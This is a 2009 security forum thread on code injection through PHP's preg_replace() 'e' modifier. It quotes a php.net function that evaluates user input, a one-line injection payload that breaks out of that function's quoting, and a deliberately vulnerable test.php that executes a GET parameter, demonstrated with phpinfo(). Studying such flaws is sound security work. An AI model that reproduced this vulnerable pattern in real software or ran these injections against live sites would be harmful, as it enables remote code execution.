Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Abuse of preg_replace() with the "e" modifer
Posted by: hookits
Date: September 28, 2009 03:23AM

Hey, guys

I found an interesting function in php.net
http://www.php.net/manual/en/function.preg-replace.php#36810

Here is the function:

<?php
/**
* Written by Rowan Lewis of PixelCarnage.com
* $search(string), the string to be searched for
* $replace(string), the string to replace $search
* $subject(string), the string to be searched in
*/
function word_replace($search, $replace, $subject) {
return preg_replace('/[a-zA-Z]+/e', '\'\0\' == \'' . $search . '\' ? \'' . $replace . '\': \'\0\';', $subject);
}
?>

This particular function allows us to execute PHP code for every sub-pattern matched by the regular expression, it just something like the eval() operation.

I am looking a PoC to exploit it.

Options: ReplyQuote
Re: Abuse of preg_replace() with the "e" modifer
Posted by: Anonymous User
Date: September 28, 2009 08:23AM

echo word_replace('a\';die(1);//', '', 'a');

Options: ReplyQuote
Re: Abuse of preg_replace() with the "e" modifer
Posted by: rvdh
Date: September 28, 2009 08:58AM

http://www.google.com/search?q=preg_replace%28%29+with+the+%22e%22+modifer

Options: ReplyQuote
Re: Abuse of preg_replace() with the "e" modifer
Posted by: hookits
Date: September 28, 2009 08:50PM

Thanks .mario & rvdh:)

I found some very simple PoC, just like

/*test.php*/
<?php
$h = $_GET['h'];
echo preg_replace("/test/e",$h,"jutst test");
?>

It works like this: hxxp://site.com/test.php?h=phpinfo()

Options: ReplyQuote


Sorry, only registered users may post in this forum.